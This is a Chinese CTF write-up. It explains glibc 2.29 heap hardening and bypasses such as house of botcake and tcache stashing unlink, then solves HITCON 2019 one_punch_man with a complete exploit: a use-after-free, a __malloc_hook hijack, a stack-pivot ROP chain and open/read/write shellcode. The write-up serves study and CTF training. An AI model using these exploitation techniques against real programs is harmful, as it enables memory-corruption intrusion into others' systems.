新增保护机制

tcache

tcache_entry结构体新增了一个指针key,存放在chunk的bk处:tcache_put时写入,tcache_get时清空

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/* Push CHUNK onto the head of tcache bin TC_IDX.

   Only the bin index is asserted here; no capacity check is done in
   this function, so the caller is responsible for the bin having room.
   The entry is stamped with the tcache pointer in its key field.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;

  /* Link the entry in as the new head of the bin's singly linked list
     and account for it.  */
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

/* Pop the head entry of tcache bin TC_IDX and return it as a user
   pointer.

   The caller must pass a valid index for a non-empty bin; both
   conditions are only asserted.  The next pointer stored in the entry
   is installed as the new bin head without any further validation.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  /* The bin head must be non-NULL (pointer compared against 0).  */
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  /* Clear the "in the tcache" marker written by tcache_put.  */
  e->key = NULL;
  return (void *) e;
}

在free一个chunk并准备将其放入tcache时,新增了一个判断分支:如果chunk的bk位置(即e->key)等于tcache,则会遍历对应大小的tcache链表,检查其中是否已经存在相同的chunk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#if USE_TCACHE
  /* Fragment of the free path: try to place chunk P into the tcache,
     after a double-free check based on the key field.  */
  {
    /* Bin index derived from the chunk size.  */
    size_t tc_idx = csize2tidx (size);
    if (tcache != NULL && tc_idx < mp_.tcache_bins)
      {
        /* Check to see if it's already in the tcache.  */
        tcache_entry *e = (tcache_entry *) chunk2mem (p);

        /* This test succeeds on double free.  However, we don't 100%
           trust it (it also matches random payload data at a 1 in
           2^<size_t> chance), so verify it's not an unlikely
           coincidence before aborting.  */
        if (__glibc_unlikely (e->key == tcache))
          {
            tcache_entry *tmp;
            LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
            /* Only the single bin selected by tc_idx is walked; the
               abort fires when E itself is found on that list.  */
            for (tmp = tcache->entries[tc_idx];
                 tmp;
                 tmp = tmp->next)
              if (tmp == e)
                malloc_printerr ("free(): double free detected in tcache 2");
            /* If we get here, it was a coincidence.  We've wasted a
               few cycles, but don't abort.  */
          }

        /* Cache the chunk only while the bin is below the configured
           per-bin limit; otherwise fall through to the code after
           this fragment.  */
        if (tcache->counts[tc_idx] < mp_.tcache_count)
          {
            tcache_put (p, tc_idx);
            return;
          }
      }
  }
#endif

如何绕过呢??

  • 修改bk使不进入循环分支

  • 修改size从而修改tc_idx

  • house of botcake:合并chunk1 chunk2进unsortedbins,将chunk2链进tcache,从chunk1分配一个大chunk造成overlapped到chunk2修改其fd

  • fastbin_reverse_into_tcache

unsortedbins

新增检查

  • size是否合理

  • next chunk的prev_size是否等于victim的size

  • 双向链表完整性检查

  • next chunk的prev_inuse位是否为0

1
2
3
4
5
6
7
8
9
10
/* Sanity checks applied to an unsorted-bin chunk (victim).  `size`,
   `next`, `bck` and `victim` are set up outside this excerpt;
   presumably next is the chunk following victim and bck is
   victim->bk -- confirm against the full source.  */

/* 1. The size must be larger than 2 * SIZE_SZ and no larger than the
      arena's system_mem.  */
if (__glibc_unlikely (size <= 2 * SIZE_SZ)
    || __glibc_unlikely (size > av->system_mem))
  malloc_printerr ("malloc(): invalid size (unsorted)");
/* 2. prev_size of next, with the SIZE_BITS flag bits masked off, must
      equal size.  */
if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
  malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
/* 3. List integrity: bck->fd must point back at victim and victim->fd
      must be the unsorted bin head.  */
if (__glibc_unlikely (bck->fd != victim)
    || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
  malloc_printerr ("malloc(): unsorted double linked list corrupted");
/* 4. The prev_inuse bit of next must be clear.  */
if (__glibc_unlikely (prev_inuse (next)))
  malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

malloc overlap

当向后合并(低地址)时,会检查上个chunk的size和当前chunk的prev_size是否相等

1
2
3
4
5
6
7
8
9
/* consolidate backward */
/* Merge P with the chunk in front of it (lower address) when P's
   prev_inuse bit is clear.  */
if (!prev_inuse(p)) {
  prevsize = prev_size (p);
  size += prevsize;
  /* Step back by prev_size to reach the previous chunk's header.  */
  p = chunk_at_offset(p, -((long) prevsize));
  /* The size recorded in the previous chunk's own header must match
     the prev_size field that was just used to locate it.  */
  if (__glibc_unlikely (chunksize(p) != prevsize))
    malloc_printerr ("corrupted size vs. prev_size while consolidating");
  unlink_chunk (av, p);
}

以下假设有off by null漏洞👇

在之前的glibc版本中还存在双向链表检查,我们一般是通过将要合并的chunk放入unsortedbins中获得系统给的fd和bk来绕过以达到chunk overlapping的目的。但是2.29的新机制无法通过这个方式绕过双向链表检查。

如何绕过呢???

主要思路是利用从largebin中分配的残留指针 fd_nextsize / bk_nextsize,因为largebin中只有一个chunk时,这两个指针指向自己,先通过部分覆盖修改fd_nextsize的第一个字节,使其指向一个我们可以控制bk的chunk,例如利用smallbins或unsortedbins的机制部分覆盖bk指向fake_chunk。这时bk_nextsize仍然指向自己。利用同样的思路将其链入fastbins中部分覆盖第一个字节使其指向fake_chunk。这样双向链表就构造好了

总结一下就是利用smallbins会在bk写入堆地址,fastbins会在fd写入堆地址,然后部分覆盖构造双向链表。但是我们无法保证堆地址第二个字节是\x00,所以这种攻击方式有6.25%的概率会成功:]

top chunk

1
2
/* Reject a size larger than the arena's system_mem; judging by the
   error message, `size` here is the top chunk's size (set outside this
   excerpt -- confirm against the full source).  */
if (__glibc_unlikely (size > av->system_mem))
  malloc_printerr ("malloc(): corrupted top size");

GG

Hitcon-CTF2019-one_punch_man

保护全开

1
2
3
4
5
Arch:     amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

程序有5个功能:

add

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/* Decompiled "add" menu handler: reads a slot index and a hero name,
   stages the name in a stack buffer, then stores a calloc'ed copy and
   its length in the global slot table.  Returns the stack-canary XOR
   produced by the decompiler.
   NOTE(review): error() presumably does not return -- confirm.  */
unsigned __int64 __fastcall Add(__int64 a1, __int64 a2)
{
  unsigned int idx; // [rsp+8h] [rbp-418h]
  signed int name_len; // [rsp+Ch] [rbp-414h]
  char s[1032]; // [rsp+10h] [rbp-410h]
  unsigned __int64 v6; // [rsp+418h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  MyPuts("idx: ");
  idx = read_int();
  // idx is unsigned, so only slots 0..2 pass this check.
  if ( idx > 2 )
    error((__int64)"invalid");
  MyPuts("hero name: ");
  memset(s, 0, 1024uLL);
  // At most 0x400 bytes of input are staged on the stack.
  name_len = read(0, s, 0x400uLL);
  if ( name_len <= 0 )
    error((__int64)"io");
  // Overwrite the last byte read with NUL (presumably the newline).
  s[name_len - 1] = 0;
  // Accept lengths 0x80..0x400; the upper bound cannot trigger because
  // read() above is already capped at 0x400.
  if ( name_len <= 0x7F || name_len > 0x400 )
    error((__int64)"poor hero name");
  // Slot layout: pointer at unk_4040 + 16*idx, length in
  // qword_4048[2*idx].  The allocation is made with calloc, not malloc.
  *((_QWORD *)&unk_4040 + 2 * idx) = calloc(1uLL, name_len);
  qword_4048[2 * idx] = name_len;
  // strncpy stops copying at the first NUL in s and zero-pads the rest.
  strncpy(*((char **)&unk_4040 + 2 * idx), s, name_len);
  // Wipe the first 0x400 bytes of the staging buffer before returning.
  memset(s, 0, 0x400uLL);
  return __readfsqword(0x28u) ^ v6;
}

在这个函数里允许我们分配0x80-0x400大小的chunk,并把初始化chunk的内容先保存在栈上再通过strncpy传送到堆里,rebase(0x4040)会依次保存chunk地址和大小且只能同时分配三个。注意这里分配chunk使用的是calloc,即不会从tcache中取chunk。

free

1
2
3
4
5
6
7
8
9
10
/* Decompiled "free" menu handler: frees the pointer stored in the
   selected slot.  Neither the stored pointer nor the stored length is
   cleared afterwards, so the slot keeps a dangling pointer.  */
void __fastcall Delete(__int64 a1, __int64 a2)
{
  unsigned int v2; // [rsp+Ch] [rbp-4h]

  MyPuts("idx: ");
  v2 = read_int();
  // Unsigned compare: only slots 0..2 are accepted.
  if ( v2 > 2 )
    error((__int64)"invalid");
  free(*((void **)&unk_4040 + 2 * v2)); // uaf
}

这里没有对指针清空,存在uaf

backdoor

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* Decompiled backdoor handler: the only path in the shown code that
   calls malloc() rather than calloc().  It is gated on a byte located
   at qword_4030 + 0x20; once past the gate it allocates 0x217 bytes,
   fills them from stdin and prints them.
   NOTE(review): what qword_4030 points to is not visible here; the
   write-up treats the checked byte as heap_base+0x30 -- confirm.  */
ssize_t __fastcall Magic(__int64 a1, __int64 a2)
{
  void *buf; // [rsp+8h] [rbp-8h]

  // The gate: the checked byte must be greater than 6.
  if ( *(_BYTE *)(qword_4030 + 0x20) <= 6 )
    error((__int64)"gg");
  buf = malloc(0x217uLL);
  if ( !buf )
    error((__int64)"err");
  // Up to 0x217 bytes of input are written into the returned buffer.
  if ( read(0, buf, 0x217uLL) <= 0 )
    error((__int64)"io");
  puts("Serious Punch!!!");
  puts((const char *)&unk_2128);
  return puts((const char *)buf);
}

程序留了一个后门函数可以调用malloc,限制了利用条件 *(heap_base+0x30) > 6

edit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/* Decompiled "edit" menu handler: reads new contents from stdin
   directly into the buffer stored in the selected slot, using the
   length recorded for that slot.  The only validity check is that the
   stored pointer is non-zero; nothing here tests whether the buffer
   has been freed.  Returns the byte count from read().  */
ssize_t __fastcall rename(__int64 a1, __int64 a2)
{
  ssize_t result; // rax
  unsigned int v3; // [rsp+Ch] [rbp-4h]

  MyPuts("idx: ");
  v3 = read_int();
  // Unsigned compare: only slots 0..2 are accepted.
  if ( v3 > 2 )
    error((__int64)"invalid");
  if ( !*((_QWORD *)&unk_4040 + 2 * v3) )
    error((__int64)"err");
  MyPuts("hero name: ");
  // Write up to the stored length into the stored pointer.
  result = read(0, *((void **)&unk_4040 + 2 * v3), qword_4048[2 * v3]);
  if ( result <= 0 )
    error((__int64)"io");
  return result;
}

show

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/* Decompiled "show" menu handler: prints the buffer stored in the
   selected slot as a C string via puts().  The only check is that the
   stored pointer is non-zero; nothing here tests whether the buffer
   has been freed.  Returns the stored pointer value when it is zero,
   otherwise the result of puts().  */
ssize_t __fastcall Show(__int64 a1, __int64 a2)
{
  ssize_t result; // rax
  unsigned int v3; // [rsp+Ch] [rbp-4h]

  MyPuts("idx: ");
  v3 = read_int();
  // Unsigned compare: only slots 0..2 are accepted.
  if ( v3 > 2 )
    error((__int64)"invalid");
  result = *((_QWORD *)&unk_4040 + 2 * v3);
  if ( result )
  {
    MyPuts("hero name: ");
    // Output runs until the first NUL byte in the buffer.
    result = puts(*((const char **)&unk_4040 + 2 * v3));
  }
  return result;
}

因为存在uaf,所以我们可以很容易地leak出堆地址和libc地址,同时存在edit函数可以修改tcache的fd,只要可以调用程序留给我们的后门函数中的malloc就可以实现任意地址写

那么如何将heap_base+0x30处的值修改为一个large value呢

这里就要用到glibc2.29下的一种利用手法tcache_stashing_unlink_attack

先贴主要用到的glibc源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/* Excerpt of the smallbin path of the allocator (truncated: the
   enclosing blocks are closed after the end of this excerpt).  A chunk
   is taken from the tail of the bin, then further chunks of the same
   bin are moved ("stashed") into the tcache.  */
if (in_smallbin_range (nb))
  {
    idx = smallbin_index (nb);
    bin = bin_at (av, idx);

    /* Non-empty bin: the victim is the chunk at the tail.  */
    if ((victim = last (bin)) != bin)
      {
        bck = victim->bk;
        /* Integrity check for the chunk being returned: its bk
           neighbour must point back at it.  */
        if (__glibc_unlikely (bck->fd != victim))
          malloc_printerr ("malloc(): smallbin double linked list corrupted");
        set_inuse_bit_at_offset (victim, nb);
        /* Unlink victim from the tail of the bin.  */
        bin->bk = bck;
        bck->fd = bin;

        if (av != &main_arena)
          set_non_main_arena (victim);
        check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
        /* While we're here, if we see other chunks of the same size,
           stash them in the tcache.  */
        size_t tc_idx = csize2tidx (nb);
        if (tcache && tc_idx < mp_.tcache_bins)
          {
            mchunkptr tc_victim;

            /* While bin not empty and tcache not full, copy chunks over.  */
            while (tcache->counts[tc_idx] < mp_.tcache_count
                   && (tc_victim = last (bin)) != bin)
              {
                if (tc_victim != 0)
                  {
                    /* Unlike the victim above, no bck->fd == tc_victim
                       check is made here before bck is written
                       through; bck is taken straight from
                       tc_victim->bk.  */
                    bck = tc_victim->bk;
                    set_inuse_bit_at_offset (tc_victim, nb);
                    if (av != &main_arena)
                      set_non_main_arena (tc_victim);
                    bin->bk = bck;
                    /* Stores the bin address at bck->fd.  */
                    bck->fd = bin;

                    tcache_put (tc_victim, tc_idx);
                  }
              }
          }
#endif

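因为我们无法像how2heap中那样把fake_chunk->bk修改为一个可写的地址(如果stash循环继续,fake_chunk会成为下一个tc_victim,执行bck = tc_victim->bk; bck->fd = bin时就会向fake_chunk->bk指向的位置写入),所以我们只在tcache中预留一个位置,让循环在chunk1进入tcache后就因为tcache已满而结束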

那么如何使得smallbins存在两个chunk并且相应大小的tcache未满呢??

这里用到一个技巧,通过分配并释放一个较大的chunk,然后利用分割机制拿到我们想要的size

1
2
3
4
5
6
7
8
9
10
11
12
# Excerpt of the exploit script; add()/free() are its menu helpers.
# Allocates the 0x210-sized chunks used later (slots 0 and 1) and frees
# one more 0x210 chunk through slot 2.
add(0,"aaaa",0x210)
add(2,"tcache",0x210)
free(2)#fill tcache done
add(1,"bbbb",0x210)
·
·
·
# Free each 0x210 chunk, then immediately request 0x180; per the
# surrounding write-up this splits the freed chunk so that a smaller
# remainder is left behind (the bins dump that follows shows two
# 0x90-sized chunks in the smallbin).
free(0)
add(2,"cccc",0x180)
free(1)
add(2,"dddd",0x180)
# NOTE(review): the trailing note says malloc_consolidate, but a 0xa0
# request is presumably what moves the leftover remainder from the
# unsorted bin into the smallbin -- confirm against _int_malloc.
add(2,"cccc",0xa0)#malloc_consolidate

此时的堆布局:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
pwndbg> bins
tcachebins
0x90 [ 6]: 0x564cf556c850 —▸ 0x564cf556c7c0 —▸ 0x564cf556c730 —▸ 0x564cf556c6a0 —▸ 0x564cf556c610 —▸ 0x564cf556c580 ◂— 0x0
0x220 [ 7]: 0x564cf556c140 —▸ 0x7f1d7731dc30 (__malloc_hook) ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0x90: 0x564cf556c4e0 —▸ 0x564cf556c0a0 —▸ 0x7f1d7731dd20 (main_arena+224) ◂— 0x564cf556c4e0
largebins
empty
pwndbg> x/2gx 0x564cf556c4e0
0x564cf556c4e0: 0x0000000000000000 0x0000000000000091
pwndbg> x/2gx 0x564cf556c0a0
0x564cf556c0a0: 0x0000000000000000 0x0000000000000091

然后修改chunk1的bk为heap_base+0x20,再分配一个相应大小的chunk触发攻击

chunk1会链入相应的tcache,heap_base+0x20处的fake_chunk会被当成bck,并会将smallbin赋值给其fd

1
2
3
4
5
6
7
8
9
pwndbg> x/10gx 0x564cf556b000
0x564cf556b000: 0x0000000000000000 0x0000000000000251
0x564cf556b010: 0x0700000000000000 0x0000000000000000
0x564cf556b020: 0x0000000000000000 0x0000000000000000
0x564cf556b030: 0x00007f1d7731dd20 0x0000000000000000
0x564cf556b040: 0x0000000000000000 0x0000000000000000
pwndbg> x/4gx 0x00007f1d7731dd20
0x7f1d7731dd20 <main_arena+224>: 0x00007f1d7731dd10 0x00007f1d7731dd10
0x7f1d7731dd30 <main_arena+240>: 0x0000564cf556c4e0 0x0000564cf556b020

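此时tcache已经被我们打烂了:stash过程中的 bck->fd = bin 把smallbin的地址(main_arena+224,即0x00007f1d7731dd20)写到了heap_base+0x30,而这里正好是tcache->counts中0x220这个bin的计数开始的8个字节,所以0x220~0x270这几个bin的计数分别变成了该地址的各个字节(0x20、0xdd、0x31、0x77、0x1d、0x7f,对应下面的32、-35、49、119、29、127)。这也正好满足了后门函数要求的 *(heap_base+0x30) > 6。还好我们之前已经修改了fd,这时直接调用malloc就可以劫持malloc_hook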

1
2
3
4
5
6
7
8
9
pwndbg> bins
tcachebins
0x90 [ 7]: 0x564cf556c4f0 —▸ 0x564cf556c850 —▸ 0x564cf556c7c0 —▸ 0x564cf556c730 —▸ 0x564cf556c6a0 —▸ 0x564cf556c610 —▸ 0x564cf556c580 ◂— 0x0
0x220 [ 32]: 0x564cf556c140 —▸ 0x7f1d7731dc30 (__malloc_hook) ◂— 0x0
0x230 [-35]: 0x0
0x240 [ 49]: 0x0
0x250 [119]: 0x0
0x260 [ 29]: 0x0
0x270 [127]: 0x0

因为这题使用 seccomp 开启了沙箱保护,只有白名单上的系统调用可以使用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# seccomp-tools dump ./one_punch
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x01 0x00 0xc000003e if (A == ARCH_X86_64) goto 0003
0002: 0x06 0x00 0x00 0x00000000 return KILL
0003: 0x20 0x00 0x00 0x00000000 A = sys_number
0004: 0x15 0x00 0x01 0x0000000f if (A != rt_sigreturn) goto 0006
0005: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0006: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0008
0007: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0008: 0x15 0x00 0x01 0x0000003c if (A != exit) goto 0010
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0010: 0x15 0x00 0x01 0x00000002 if (A != open) goto 0012
0011: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0012: 0x15 0x00 0x01 0x00000000 if (A != read) goto 0014
0013: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0014: 0x15 0x00 0x01 0x00000001 if (A != write) goto 0016
0015: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0016: 0x15 0x00 0x01 0x0000000c if (A != brk) goto 0018
0017: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0018: 0x15 0x00 0x01 0x00000009 if (A != mmap) goto 0020
0019: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0020: 0x15 0x00 0x01 0x0000000a if (A != mprotect) goto 0022
0021: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0022: 0x15 0x00 0x01 0x00000003 if (A != close) goto 0024
0023: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0024: 0x06 0x00 0x00 0x00000000 return KILL

我们无法执行execve系统调用,只能通过orw(open/read/write)来读取flag

因为调用add函数时,程序先将我们的输入放在了栈上,所以考虑在此处构造rop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
pwndbg> stack 20
00:0000│ rsp 0x7ffd2f88c210 —▸ 0x7f570f3814c0 (_dl_tunable_set_mallopt_check) ◂— mov eax, dword ptr [rdi]
01:0008│     0x7ffd2f88c218 ◂— 0x10100000002
02:0010│ rsi 0x7ffd2f88c220 —▸ 0x7f570f3229a0 (init_cacheinfo+240) ◂— pop rdi
03:0018│     0x7ffd2f88c228 —▸ 0x564a8ba4e000 ◂— 0x0
04:0020│     0x7ffd2f88c230 —▸ 0x7f570f3253a5 (insert_module+85) ◂— pop rsi
05:0028│     0x7ffd2f88c238 ◂— 0x10000
06:0030│     0x7ffd2f88c240 —▸ 0x7f570f302b9a ◂— pop rdx
07:0038│     0x7ffd2f88c248 ◂— 0x7
08:0040│     0x7ffd2f88c250 —▸ 0x7f570f3ee370 (mprotect) ◂— mov eax, 0xa
09:0048│     0x7ffd2f88c258 —▸ 0x564a8ba4f990 ◂— 0x3148c03148e78948
0a:0050│     0x7ffd2f88c260 ◂— 0x67616c66 /* 'flag' */
0b:0058│     0x7ffd2f88c268 ◂— 0x0
...

在调用calloc里有一系列抬高栈顶的操作,将malloc_hook改为add rsp,48h;ret就可以执行我们构造的rop

完整exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
# Exploit script for the one_punch binary (glibc 2.29).
# NOTE(review): appears to target Python 2 pwntools -- received data and
# str literals are mixed freely (e.g. recvuntil(...).ljust(8,'\x00')).
from pwn_debug import*
pdb = pwn_debug("./one_punch")
pdb.debug('2.29')
p = pdb.run("debug")

#context.log_level = "debug"
libc = ELF("/glibc/x64/2.29/lib/libc-2.29.so")
one_gadget = [0xc1720,0xdf212,0xdf21e]

# ---- menu helpers -------------------------------------------------------

def add(index,content,size):
    # Menu option 1: the name is padded with NUL bytes up to `size`.
    p.sendlineafter("> ","1")
    p.sendlineafter("idx: ",str(index))
    p.sendlineafter("name: ",content.ljust(size,'\x00'))

def edit(index,content):
    # Menu option 2: overwrite the buffer stored in slot `index`.
    p.sendlineafter("> ","2")
    p.sendlineafter("idx: ",str(index))
    p.sendlineafter("name: ",content)

def show(index):
    # Menu option 3: print the buffer stored in slot `index`.
    p.sendlineafter("> ","3")
    p.sendlineafter("idx: ",str(index))

def free(index):
    # Menu option 4: free slot `index` (index is sent without a newline).
    p.sendlineafter("> ","4")
    p.sendafter("idx: ",str(index))

def malloc(content):
    # Hidden menu option 50056: the backdoor that calls malloc(0x217).
    p.sendlineafter("> ","50056")
    p.sendline(content)

def g():
    # Attach gdb with a breakpoint at PIE offset 0x1235.
    gdb.attach(p,"b *$rebase(0x1235)")

# ---- leak heap and libc -------------------------------------------------

# Free six 0x210 chunks through slot 0, then read the freed chunk back
# through the dangling pointer to leak a heap address.
for i in range(6):
    add(0,"aaaa",0x210)
    free(0)
show(0)
heap_leak = u64(p.recvuntil('\n',drop=True)[-6:].ljust(8,'\x00'))
# NOTE(review): the offsets below are specific to this heap layout.
heap_base = heap_leak - 0x4e0 - 0x5c0 - 0x40
info("heap_base:" + hex(heap_base))
add(0,"aaaa",0x210)
add(2,"tcache",0x210)
free(2)#fill tcache done
add(1,"bbbb",0x210)

# Seventh+1 free of this size: read it back to leak a libc address.
free(0)
show(0)
libc_leak = u64(p.recvuntil('\n',drop=True)[-6:].ljust(8,'\x00'))
# NOTE(review): 0x3b3ca0 is the leak's offset in this particular libc build.
libc.address = libc_leak - 0x3b3ca0
info("libc_base:" + hex(libc.address))

# Slot 2 still points at the chunk freed above; overwrite its first
# 8 bytes with the address of __malloc_hook.
edit(2,p64(libc.sym['__malloc_hook']))#change fd

add(0,"aaaa",0x210)

# ---- tcache stashing unlink ---------------------------------------------

# Free six 0x80-sized allocations through slot 2.
for i in range(6):
    add(2,"aaaa",0x80)
    free(2)
free(0)
add(2,"cccc",0x180)
free(1)
add(2,"dddd",0x180)
add(2,"cccc",0xa0)
# Through the dangling slot-1 pointer: 0x180 bytes of padding, then a
# chunk header (prev_size 0, size 0x91), fd = heap_base+0x10a0 and
# bk = heap_base+0x20.
edit(1,"a"*0x180+p64(0)+p64(0x91)+p64(heap_base+0x10a0) + p64(heap_base + 0x20))
# A 0x80 request triggers the attack.
add(2,"eeee",0x80)

# ---- ROP chain and shellcode --------------------------------------------

# NOTE(review): gadget offsets are specific to this libc build.
pop_rdi = libc.address + 0x219a0
pop_rsi = libc.address + 0x243a5
pop_rdx = libc.address + 0x1b9a
mprotect = libc.sym['mprotect']

# mprotect(heap_base, 0x10000, 7), then return to heap_base+0x1990
# (presumably where the shellcode added below ends up -- confirm).
rop = flat(
    pop_rdi,
    heap_base,
    pop_rsi,
    0x10000,
    pop_rdx,
    7,
    mprotect,
    heap_base+0x1990
)
# Shellcode: syscall 2 (open) on the string at rsp with rsi = 0,
# syscall 0 (read) of 0x123 bytes from the returned fd into that same
# stack location, then syscall 1 (write) of that buffer to fd 1.
# The "flag\x00" string is appended right after the ROP chain below.
sc = asm(
'''
mov rdi, rsp;
xor rax, rax;
xor rsi, rsi;
mov al, 2;
syscall;

mov rsi, rdi;
mov rdi, rax;
mov dx, 0x123;
xor rax, rax;
syscall;

xor rdi,rdi;
add rdi, 1;
xor rax, rax;
mov al, 1;
syscall;
'''
)
add(0,sc,0x100)#orw

# ---- hijack __malloc_hook -----------------------------------------------

# Two backdoor malloc calls; the second one carries the gadget address.
malloc("cccc")
g()
# NOTE(review): the purpose of the 2-byte "ff" prefix in front of the
# gadget address is not evident from this script -- confirm.
malloc("ff"+p64(libc.address+0xbe131))#add rsp,0x48;ret

# The name (ROP chain + "flag\x00") is staged on the stack by Add before
# it calls calloc, which is what the stack-pivot gadget relies on.
add(2,(rop+"flag\x00"),0x400)

p.interactive()

reference

https://bbs.pediy.com/thread-257901.htm

http://blog.eonew.cn/archives/1233